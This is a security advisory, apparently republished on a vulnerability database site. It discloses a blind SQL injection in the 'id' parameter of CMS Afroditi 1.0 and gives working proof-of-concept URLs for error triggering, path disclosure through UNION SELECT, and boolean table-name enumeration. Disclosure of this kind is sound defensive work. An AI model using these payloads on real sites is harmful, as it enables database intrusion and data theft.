CMS Afroditi 1.0 Blind SQL Injection

2013-12-31 / 2014-01-11
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: CMS Afroditi v.1.0 Blind SQL Injection # Date: 30/12/2013 # Exploit Author: projectzero labs # Vendor Homepage: http://www.naxtech.com # Vendor Informed: 20 & 24/12/2013 # Software Demo: http://afroditi.naxtech.com # Version: v.1.0 About the software: =================== ?s indicated in the vendor's site: CMS Afroditi is a content management system, powerful and user-friendly, mainly aimed at small businesses and but also appropriate for firms and organisations of all sizes who are in need for a very flexible yet simple system to manage their website. The CMS is written in ASP and it's using the Microsoft JET Database (Access). Vulnerability Details: ====================== projectzero labs identified a blind sql injection vulnerability in the "id" variable. Example: ======== The following URL can be used to trigger an SQL injection vulnerability in the "default.asp" web page: http://site.tld/default.asp?id=0' The error that proofs the sql injection vulnerability: ################################################################## Microsoft JET Database Engine error '80040e14' Syntax error (missing operator) in query expression 'id = 0'''. /default.asp, line 104 ################################################################## Exploitation & PoC: =================== An attacker must brute force all the names for table and column used by the website in order to extract data from MS Access database. Internal path disclosure: http://site.tld/default.asp?id=1 union select 1 from random.randomtable The internal path can be discovered through this error output: ################################################################## Microsoft JET Database Engine error '80004005' Could not find file 'c:\windows\system32\inetsrv\random.mdb'. /default.asp, line 104 ################################################################## Example for the table names extraction: http://site.tld/default.asp?id=25 and 0<=(SELECT count(*) FROM [site]) and 1=1 ---> WHITE PAGE -=> TABLE FOUND! http://site.tld/default.asp?id=25 and 0<=(SELECT count(*) FROM [notatable]) and 1=1 ---> ERROR -=> TABLE NOT FOUND! Severity: ========= High Credits: ======== projectzero labs@projectzero.gr http://www.projectzero.gr

References:

http://afroditi.naxtech.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top